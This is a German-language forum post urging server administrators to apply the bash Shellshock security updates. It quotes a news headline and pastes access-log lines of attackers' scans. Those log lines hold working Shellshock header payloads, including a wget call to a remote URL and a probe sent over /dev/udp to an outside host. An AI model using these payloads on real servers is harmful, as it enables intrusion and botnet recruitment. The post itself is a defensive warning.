Server admins ziemlich wichtig bash security updates
-
-
Bite es ist ein wichtige bug und update auch wen man vielleicht es nicht ausnutzen kan so 123
Alles ist aber noch nicht 100% was man damit machen könnte und die hacker scannen versuchen einfach so einiges. ( wen die dan auf etwas anderes stossen oder so besser nicht)
Wen man dass betriebsysteem up to date hat ist es wirklich besser sagen Unserer Server hosters. Weil dieser teil ist in viele betriebsysteme standard drin!Wen man nicht selbe serveradmin ist dan besser nachfragen!
weil
ZitatHackers Are Already Using the Shellshock Bug to Launch Botnet Attacks
-
Ach ja den APPLE MACOS OS X user sehe
http://apple.stackexchange.com/questions/1468…n/146851#146851 -
Wen plesk dan hmm
Sehe was die attacker allen so versuchenZitatGET / HTTP/1.1" 200 10061 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
"GET / HTTP/1.1" 200 14758 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
"GET / HTTP/1.1" 200 14758 "-" "() { :;}; wget 'http://x.x/s.php?s=http://x-x.x/'"
"GET / HTTP/1.1" 200 35695 "-" "() { :;}; echo aa>/tmp/aa"
"GET / HTTP/1.1" 200 9603 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
"GET / HTTP/1.1" 200 9620 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
"GET / HTTP/1.1" 200 9621 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
"GET / HTTP/1.1" 302 406 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 336 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 527 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 743 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 253 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 449 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1248 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1249 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1250 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1251 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1252 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1253 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1254 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1255 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1256 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1257 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1258 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 126167 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1262 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 15878 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 17947 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 24746 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 36533 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 46463 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 7355 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"